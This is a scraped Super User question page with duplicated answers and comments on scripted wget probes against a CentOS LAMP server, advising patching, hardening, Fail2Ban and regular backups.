No I mean I understand but here's the thing: it's a layer. What do you lose? People can pivot private addresses A LOT easier than public addresses. It's not perfect and the IP report might lead to nothing but CMON, it might lead to something about as easily.
– Michael Bailey
Aug 30 '15 at 6:50
@DanielB but even the default installation isn't half bad. You really have to f up somewhere to have a configuration failure.
– Michael Bailey
Aug 30 '15 at 6:51
add a comment |
Your Answer
StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "3"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});
function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: true,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: 10,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});
}
});
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsuperuser.com%2fquestions%2f962940%2fshould-i-be-concerned-about-hacking-attempts-via-wget-on-a-centos-lamp-based-web%23new-answer', 'question_page');
}
);
Post as a guest
Required, but never shown
2 Answers
2
active
oldest
votes
2 Answers
2
active
oldest
votes
active
oldest
votes
active
oldest
votes
As Fiasco Labs points out in their answer, these type of log entries are a dime-a-dozen. But as a systems administrator with a deep history managing and protection LAMP-based web servers, this is not an attack as much a scripted “probe” of your system by someone somewhere. These probes/scans of a system are done to see what—if any—servers out there are vulnerable; not just your servers. In general this is the equivalent of the “war dialing” that was fairly commonplace in the 1980s/1990s days of system hacking via acoustic modem; scan a list of systems, see what systems have “flaws” and then see what you can do with those supposed flaws.
Should you be panicked about this? Not at all. Any and every web server on the Internet is being constantly probed. I manage a few Ubuntu Linux web servers and I am 100% positive if I were to check my logs right now, tomorrow, a day from now, etc… I would see entries similar to what you are seeing. But I am not losing sleep over this at all. The reality is if your core OS is properly patched and the framework you are using is patched and up to date, you are in good shape.
Using a tool like Fail2Ban is not a bad idea, but I consider it a bit of overkill if you ask me. The reason being that even with a tool like Fail2Ban or even ModSecurity, a clever bot might still get through. Which is why my best advice to any systems administrator is to harden their servers and have a way to easily recover from a systems compromise.
Harden Your Server and Your Codebase
What I consider best security practice is hardening you LAMP server setup and ensuring our PHP code is solid. This answer on the security Stack Exchange site is a good starting point in understanding what “hardening” means, but honestly if you are not a systems administrator much of this might be over your head.
So I would recommend that unless you are truly up to the task of learning how to be a Linux systems administrator, you might be better off using some shared hosting provider somewhere. That way their admins use their skills to worry about this stuff and you can concentrate on running/coding the website.
That said, even with a shared hosting setup, you are not off of the hook. Even if you are using a well-regarding PHP framework, you need to stay on top of patching that PHP framework pretty much whenever an update is released. And as far as your core code base, you should be sure to not cut corners on basic security practice in how you code. You basically should learn how to sanitize any/all input your site receives and how to properly setup the site so even if it fails, it doesn’t do so in a way that is a disaster.
Backups and Disaster Recovery
And in my mind that means backups, backups, backups as well as more backups. You can never control server compromise, but data/system recovery is always in your control. Which all means you need to have some kind of small-scale “disaster recovery plan” in place to restore your site.
Which means, be sure to backup your core codebase so if it is ever compromised, you can easily redeploy clean code without much effort. To that end I would highly recommend you use a source code management tool like git for your version tracking as well as setting up a GitHub repository for remote storage. Also, learn how to use Capistrano with PHP to deploy code; I have an answer that addresses how to do this over here.
Ditto with your MySQL database; depending on size/scale have backups available. I like to have MySQL backups on small-to-medium sized sites run every 3-4 hours. That way the worst that might happen if a site is hacked is the database is at the most 3-4 hours stale; a stale database within the same day is better than a wrecked database with no backup at all.
edited Mar 20 '17 at 10:17
Community♦
1
answered Aug 30 '15 at 4:32
JakeGouldJakeGould
32.7k10100142
add a comment |
As Fiasco Labs points out in their answer, these type of log entries are a dime-a-dozen. But as a systems administrator with a deep history managing and protection LAMP-based web servers, this is not an attack as much a scripted “probe” of your system by someone somewhere. These probes/scans of a system are done to see what—if any—servers out there are vulnerable; not just your servers. In general this is the equivalent of the “war dialing” that was fairly commonplace in the 1980s/1990s days of system hacking via acoustic modem; scan a list of systems, see what systems have “flaws” and then see what you can do with those supposed flaws.
Should you be panicked about this? Not at all. Any and every web server on the Internet is being constantly probed. I manage a few Ubuntu Linux web servers and I am 100% positive if I were to check my logs right now, tomorrow, a day from now, etc… I would see entries similar to what you are seeing. But I am not losing sleep over this at all. The reality is if your core OS is properly patched and the framework you are using is patched and up to date, you are in good shape.
Using a tool like Fail2Ban is not a bad idea, but I consider it a bit of overkill if you ask me. The reason being that even with a tool like Fail2Ban or even ModSecurity, a clever bot might still get through. Which is why my best advice to any systems administrator is to harden their servers and have a way to easily recover from a systems compromise.
Harden Your Server and Your Codebase
What I consider best security practice is hardening you LAMP server setup and ensuring our PHP code is solid. This answer on the security Stack Exchange site is a good starting point in understanding what “hardening” means, but honestly if you are not a systems administrator much of this might be over your head.
So I would recommend that unless you are truly up to the task of learning how to be a Linux systems administrator, you might be better off using some shared hosting provider somewhere. That way their admins use their skills to worry about this stuff and you can concentrate on running/coding the website.
That said, even with a shared hosting setup, you are not off of the hook. Even if you are using a well-regarding PHP framework, you need to stay on top of patching that PHP framework pretty much whenever an update is released. And as far as your core code base, you should be sure to not cut corners on basic security practice in how you code. You basically should learn how to sanitize any/all input your site receives and how to properly setup the site so even if it fails, it doesn’t do so in a way that is a disaster.
Backups and Disaster Recovery
And in my mind that means backups, backups, backups as well as more backups. You can never control server compromise, but data/system recovery is always in your control. Which all means you need to have some kind of small-scale “disaster recovery plan” in place to restore your site.
Which means, be sure to backup your core codebase so if it is ever compromised, you can easily redeploy clean code without much effort. To that end I would highly recommend you use a source code management tool like git for your version tracking as well as setting up a GitHub repository for remote storage. Also, learn how to use Capistrano with PHP to deploy code; I have an answer that addresses how to do this over here.
Ditto with your MySQL database; depending on size/scale have backups available. I like to have MySQL backups on small-to-medium sized sites run every 3-4 hours. That way the worst that might happen if a site is hacked is the database is at the most 3-4 hours stale; a stale database within the same day is better than a wrecked database with no backup at all.
edited Mar 20 '17 at 10:17
Community♦
1
answered Aug 30 '15 at 4:32
JakeGouldJakeGould
32.7k10100142
add a comment |
As Fiasco Labs points out in their answer, these type of log entries are a dime-a-dozen. But as a systems administrator with a deep history managing and protection LAMP-based web servers, this is not an attack as much a scripted “probe” of your system by someone somewhere. These probes/scans of a system are done to see what—if any—servers out there are vulnerable; not just your servers. In general this is the equivalent of the “war dialing” that was fairly commonplace in the 1980s/1990s days of system hacking via acoustic modem; scan a list of systems, see what systems have “flaws” and then see what you can do with those supposed flaws.
Should you be panicked about this? Not at all. Any and every web server on the Internet is being constantly probed. I manage a few Ubuntu Linux web servers and I am 100% positive if I were to check my logs right now, tomorrow, a day from now, etc… I would see entries similar to what you are seeing. But I am not losing sleep over this at all. The reality is if your core OS is properly patched and the framework you are using is patched and up to date, you are in good shape.
Using a tool like Fail2Ban is not a bad idea, but I consider it a bit of overkill if you ask me. The reason being that even with a tool like Fail2Ban or even ModSecurity, a clever bot might still get through. Which is why my best advice to any systems administrator is to harden their servers and have a way to easily recover from a systems compromise.
Harden Your Server and Your Codebase
What I consider best security practice is hardening you LAMP server setup and ensuring our PHP code is solid. This answer on the security Stack Exchange site is a good starting point in understanding what “hardening” means, but honestly if you are not a systems administrator much of this might be over your head.
So I would recommend that unless you are truly up to the task of learning how to be a Linux systems administrator, you might be better off using some shared hosting provider somewhere. That way their admins use their skills to worry about this stuff and you can concentrate on running/coding the website.
That said, even with a shared hosting setup, you are not off of the hook. Even if you are using a well-regarding PHP framework, you need to stay on top of patching that PHP framework pretty much whenever an update is released. And as far as your core code base, you should be sure to not cut corners on basic security practice in how you code. You basically should learn how to sanitize any/all input your site receives and how to properly setup the site so even if it fails, it doesn’t do so in a way that is a disaster.
Backups and Disaster Recovery
And in my mind that means backups, backups, backups as well as more backups. You can never control server compromise, but data/system recovery is always in your control. Which all means you need to have some kind of small-scale “disaster recovery plan” in place to restore your site.
Which means, be sure to backup your core codebase so if it is ever compromised, you can easily redeploy clean code without much effort. To that end I would highly recommend you use a source code management tool like git for your version tracking as well as setting up a GitHub repository for remote storage. Also, learn how to use Capistrano with PHP to deploy code; I have an answer that addresses how to do this over here.
Ditto with your MySQL database; depending on size/scale have backups available. I like to have MySQL backups on small-to-medium sized sites run every 3-4 hours. That way the worst that might happen if a site is hacked is the database is at the most 3-4 hours stale; a stale database within the same day is better than a wrecked database with no backup at all.
edited Mar 20 '17 at 10:17
Community♦
1
answered Aug 30 '15 at 4:32
JakeGouldJakeGould
32.7k10100142
As Fiasco Labs points out in their answer, these type of log entries are a dime-a-dozen. But as a systems administrator with a deep history managing and protection LAMP-based web servers, this is not an attack as much a scripted “probe” of your system by someone somewhere. These probes/scans of a system are done to see what—if any—servers out there are vulnerable; not just your servers. In general this is the equivalent of the “war dialing” that was fairly commonplace in the 1980s/1990s days of system hacking via acoustic modem; scan a list of systems, see what systems have “flaws” and then see what you can do with those supposed flaws.
Should you be panicked about this? Not at all. Any and every web server on the Internet is being constantly probed. I manage a few Ubuntu Linux web servers and I am 100% positive if I were to check my logs right now, tomorrow, a day from now, etc… I would see entries similar to what you are seeing. But I am not losing sleep over this at all. The reality is if your core OS is properly patched and the framework you are using is patched and up to date, you are in good shape.
Using a tool like Fail2Ban is not a bad idea, but I consider it a bit of overkill if you ask me. The reason being that even with a tool like Fail2Ban or even ModSecurity, a clever bot might still get through. Which is why my best advice to any systems administrator is to harden their servers and have a way to easily recover from a systems compromise.
Harden Your Server and Your Codebase
What I consider best security practice is hardening you LAMP server setup and ensuring our PHP code is solid. This answer on the security Stack Exchange site is a good starting point in understanding what “hardening” means, but honestly if you are not a systems administrator much of this might be over your head.
So I would recommend that unless you are truly up to the task of learning how to be a Linux systems administrator, you might be better off using some shared hosting provider somewhere. That way their admins use their skills to worry about this stuff and you can concentrate on running/coding the website.
That said, even with a shared hosting setup, you are not off of the hook. Even if you are using a well-regarding PHP framework, you need to stay on top of patching that PHP framework pretty much whenever an update is released. And as far as your core code base, you should be sure to not cut corners on basic security practice in how you code. You basically should learn how to sanitize any/all input your site receives and how to properly setup the site so even if it fails, it doesn’t do so in a way that is a disaster.
Backups and Disaster Recovery
And in my mind that means backups, backups, backups as well as more backups. You can never control server compromise, but data/system recovery is always in your control. Which all means you need to have some kind of small-scale “disaster recovery plan” in place to restore your site.
Which means, be sure to backup your core codebase so if it is ever compromised, you can easily redeploy clean code without much effort. To that end I would highly recommend you use a source code management tool like git for your version tracking as well as setting up a GitHub repository for remote storage. Also, learn how to use Capistrano with PHP to deploy code; I have an answer that addresses how to do this over here.
Ditto with your MySQL database; depending on size/scale have backups available. I like to have MySQL backups on small-to-medium sized sites run every 3-4 hours. That way the worst that might happen if a site is hacked is the database is at the most 3-4 hours stale; a stale database within the same day is better than a wrecked database with no backup at all.
edited Mar 20 '17 at 10:17
Community♦
1
answered Aug 30 '15 at 4:32
JakeGouldJakeGould
32.7k10100142
edited Mar 20 '17 at 10:17
Community♦
1
edited Mar 20 '17 at 10:17
Community♦
1
edited Mar 20 '17 at 10:17
Community♦
1
1
answered Aug 30 '15 at 4:32
JakeGouldJakeGould
32.7k10100142
answered Aug 30 '15 at 4:32
JakeGouldJakeGould
32.7k10100142
answered Aug 30 '15 at 4:32
JakeGouldJakeGould
32.7k10100142
32.7k10100142
add a comment |
add a comment |
Scripted wget attack looking for common vulnerabilities. Keep your server software up to date and most of them won't work unless they're zero-day.
You will find these are a dime a dozen on web servers, your only defense is to never allow your server to run in an unpatched state.
Read up on Centos security patching and spend more time running apt-get/yum/rpm (whatever's the package manager) to get the latest security updates.
edited Apr 13 '17 at 12:14
Community♦
1
answered Aug 27 '15 at 5:57
Fiasco LabsFiasco Labs
6,27011830
Fun fact: OP's attacker has their server in Canada. OP could manually block IP with IPtables and file a complaint with the Canadian govt if it got super personal.
– Michael Bailey
Aug 27 '15 at 7:34
1
This type of attack not only targets vulnerabilities, but also configuration mistakes. That means even the most up-to-date system could be easily hacked.
– Daniel B
Aug 27 '15 at 8:38
1
@MichaelBailey Manually blocking one IP address is like playing a game of “Whac-A-Mole” when it comes to server security. Also, a report of the IP address might lead to nothing since the IP address could be a compromised machine that is being used a part of a bot-net. Meaning that IP address could just be some honest person’s infected home PC. Better to use Fail2ban or ModSecurity to protect servers heuristically/behaviorally rather than targetting one IP as the supposed “bad guy.”
– JakeGould
Aug 30 '15 at 4:59
No I mean I understand but here's the thing: it's a layer. What do you lose? People can pivot private addresses A LOT easier than public addresses. It's not perfect and the IP report might lead to nothing but CMON, it might lead to something about as easily.
– Michael Bailey
Aug 30 '15 at 6:50
@DanielB but even the default installation isn't half bad. You really have to f up somewhere to have a configuration failure.
– Michael Bailey
Aug 30 '15 at 6:51
add a comment |
Scripted wget attack looking for common vulnerabilities. Keep your server software up to date and most of them won't work unless they're zero-day.
You will find these are a dime a dozen on web servers, your only defense is to never allow your server to run in an unpatched state.
Read up on Centos security patching and spend more time running apt-get/yum/rpm (whatever's the package manager) to get the latest security updates.
edited Apr 13 '17 at 12:14
Community♦
1
answered Aug 27 '15 at 5:57
Fiasco LabsFiasco Labs
6,27011830
Fun fact: OP's attacker has their server in Canada. OP could manually block IP with IPtables and file a complaint with the Canadian govt if it got super personal.
– Michael Bailey
Aug 27 '15 at 7:34
1
This type of attack not only targets vulnerabilities, but also configuration mistakes. That means even the most up-to-date system could be easily hacked.
– Daniel B
Aug 27 '15 at 8:38
1
@MichaelBailey Manually blocking one IP address is like playing a game of “Whac-A-Mole” when it comes to server security. Also, a report of the IP address might lead to nothing since the IP address could be a compromised machine that is being used a part of a bot-net. Meaning that IP address could just be some honest person’s infected home PC. Better to use Fail2ban or ModSecurity to protect servers heuristically/behaviorally rather than targetting one IP as the supposed “bad guy.”
– JakeGould
Aug 30 '15 at 4:59
No I mean I understand but here's the thing: it's a layer. What do you lose? People can pivot private addresses A LOT easier than public addresses. It's not perfect and the IP report might lead to nothing but CMON, it might lead to something about as easily.
– Michael Bailey
Aug 30 '15 at 6:50
@DanielB but even the default installation isn't half bad. You really have to f up somewhere to have a configuration failure.
– Michael Bailey
Aug 30 '15 at 6:51
add a comment |
Scripted wget attack looking for common vulnerabilities. Keep your server software up to date and most of them won't work unless they're zero-day.
You will find these are a dime a dozen on web servers, your only defense is to never allow your server to run in an unpatched state.
Read up on Centos security patching and spend more time running apt-get/yum/rpm (whatever's the package manager) to get the latest security updates.
edited Apr 13 '17 at 12:14
Community♦
1
answered Aug 27 '15 at 5:57
Fiasco LabsFiasco Labs
6,27011830
Scripted wget attack looking for common vulnerabilities. Keep your server software up to date and most of them won't work unless they're zero-day.
You will find these are a dime a dozen on web servers, your only defense is to never allow your server to run in an unpatched state.
Read up on Centos security patching and spend more time running apt-get/yum/rpm (whatever's the package manager) to get the latest security updates.
edited Apr 13 '17 at 12:14
Community♦
1
answered Aug 27 '15 at 5:57
Fiasco LabsFiasco Labs
6,27011830
edited Apr 13 '17 at 12:14
Community♦
1
edited Apr 13 '17 at 12:14
Community♦
1
edited Apr 13 '17 at 12:14
Community♦
1
1
answered Aug 27 '15 at 5:57
Fiasco LabsFiasco Labs
6,27011830
answered Aug 27 '15 at 5:57
Fiasco LabsFiasco Labs
6,27011830
answered Aug 27 '15 at 5:57
Fiasco LabsFiasco Labs
6,27011830
6,27011830
Fun fact: OP's attacker has their server in Canada. OP could manually block IP with IPtables and file a complaint with the Canadian govt if it got super personal.
– Michael Bailey
Aug 27 '15 at 7:34
1
This type of attack not only targets vulnerabilities, but also configuration mistakes. That means even the most up-to-date system could be easily hacked.
– Daniel B
Aug 27 '15 at 8:38
1
@MichaelBailey Manually blocking one IP address is like playing a game of “Whac-A-Mole” when it comes to server security. Also, a report of the IP address might lead to nothing since the IP address could be a compromised machine that is being used a part of a bot-net. Meaning that IP address could just be some honest person’s infected home PC. Better to use Fail2ban or ModSecurity to protect servers heuristically/behaviorally rather than targetting one IP as the supposed “bad guy.”
– JakeGould
Aug 30 '15 at 4:59
No I mean I understand but here's the thing: it's a layer. What do you lose? People can pivot private addresses A LOT easier than public addresses. It's not perfect and the IP report might lead to nothing but CMON, it might lead to something about as easily.
– Michael Bailey
Aug 30 '15 at 6:50
@DanielB but even the default installation isn't half bad. You really have to f up somewhere to have a configuration failure.
– Michael Bailey
Aug 30 '15 at 6:51
add a comment |
Fun fact: OP's attacker has their server in Canada. OP could manually block IP with IPtables and file a complaint with the Canadian govt if it got super personal.
– Michael Bailey
Aug 27 '15 at 7:34
1
This type of attack not only targets vulnerabilities, but also configuration mistakes. That means even the most up-to-date system could be easily hacked.
– Daniel B
Aug 27 '15 at 8:38
1
@MichaelBailey Manually blocking one IP address is like playing a game of “Whac-A-Mole” when it comes to server security. Also, a report of the IP address might lead to nothing since the IP address could be a compromised machine that is being used a part of a bot-net. Meaning that IP address could just be some honest person’s infected home PC. Better to use Fail2ban or ModSecurity to protect servers heuristically/behaviorally rather than targetting one IP as the supposed “bad guy.”
– JakeGould
Aug 30 '15 at 4:59
No I mean I understand but here's the thing: it's a layer. What do you lose? People can pivot private addresses A LOT easier than public addresses. It's not perfect and the IP report might lead to nothing but CMON, it might lead to something about as easily.
– Michael Bailey
Aug 30 '15 at 6:50
@DanielB but even the default installation isn't half bad. You really have to f up somewhere to have a configuration failure.
– Michael Bailey
Aug 30 '15 at 6:51
Fun fact: OP's attacker has their server in Canada. OP could manually block IP with IPtables and file a complaint with the Canadian govt if it got super personal.
– Michael Bailey
Aug 27 '15 at 7:34
Fun fact: OP's attacker has their server in Canada. OP could manually block IP with IPtables and file a complaint with the Canadian govt if it got super personal.
– Michael Bailey
Aug 27 '15 at 7:34
1
1
This type of attack not only targets vulnerabilities, but also configuration mistakes. That means even the most up-to-date system could be easily hacked.
– Daniel B
Aug 27 '15 at 8:38
This type of attack not only targets vulnerabilities, but also configuration mistakes. That means even the most up-to-date system could be easily hacked.
– Daniel B
Aug 27 '15 at 8:38
1
1
@MichaelBailey Manually blocking one IP address is like playing a game of “Whac-A-Mole” when it comes to server security. Also, a report of the IP address might lead to nothing since the IP address could be a compromised machine that is being used a part of a bot-net. Meaning that IP address could just be some honest person’s infected home PC. Better to use Fail2ban or ModSecurity to protect servers heuristically/behaviorally rather than targetting one IP as the supposed “bad guy.”
– JakeGould
Aug 30 '15 at 4:59
@MichaelBailey Manually blocking one IP address is like playing a game of “Whac-A-Mole” when it comes to server security. Also, a report of the IP address might lead to nothing since the IP address could be a compromised machine that is being used a part of a bot-net. Meaning that IP address could just be some honest person’s infected home PC. Better to use Fail2ban or ModSecurity to protect servers heuristically/behaviorally rather than targetting one IP as the supposed “bad guy.”
– JakeGould
Aug 30 '15 at 4:59
No I mean I understand but here's the thing: it's a layer. What do you lose? People can pivot private addresses A LOT easier than public addresses. It's not perfect and the IP report might lead to nothing but CMON, it might lead to something about as easily.
– Michael Bailey
Aug 30 '15 at 6:50
No I mean I understand but here's the thing: it's a layer. What do you lose? People can pivot private addresses A LOT easier than public addresses. It's not perfect and the IP report might lead to nothing but CMON, it might lead to something about as easily.
– Michael Bailey
Aug 30 '15 at 6:50
@DanielB but even the default installation isn't half bad. You really have to f up somewhere to have a configuration failure.
– Michael Bailey
Aug 30 '15 at 6:51
@DanielB but even the default installation isn't half bad. You really have to f up somewhere to have a configuration failure.
– Michael Bailey
Aug 30 '15 at 6:51
add a comment |
Thanks for contributing an answer to Super User!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsuperuser.com%2fquestions%2f962940%2fshould-i-be-concerned-about-hacking-attempts-via-wget-on-a-centos-lamp-based-web%23new-answer', 'question_page');
}
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
I had the EXACT same thing happen to my server at the same time. From my brief googling it looks somewhat similar to a shellshock attack. Make sure your system is patched. If anyone has any further info, it would be appreciated.
– user488988
Aug 27 '15 at 5:33
4
The real question is: If you have no experience, why not use a regular shared hosting plan?
– Daniel B
Aug 27 '15 at 5:47
The same IP was found attempting to hack into our systems but in a somewhat different way. We've blacklisted them and contacted their host. Over the last 5 days or so it looks like there has been some other reports on that IP.
– user490119
Aug 30 '15 at 3:19
Additionally, targeting one IP address implies that the problem of bots probing websites goes away if you simply block one address. When the reality is that IP might be blocked until the botnet decide to probe using another node/IP address. The days of simply blocking an IP address and calling it a day ended like 15+ years ago. Hardening, heuristic-based blocking and a good data recovery plan are the way to go.
– JakeGould
Aug 30 '15 at 4:49
iWeb hosting service out of Quebec, Canada. Whole netblock of addresses assigned to a datacenter to block if they decide to change it. It's like blocking an attack generated out of an Amazon Web Services EC2 VPS.
– Fiasco Labs
Aug 30 '15 at 5:10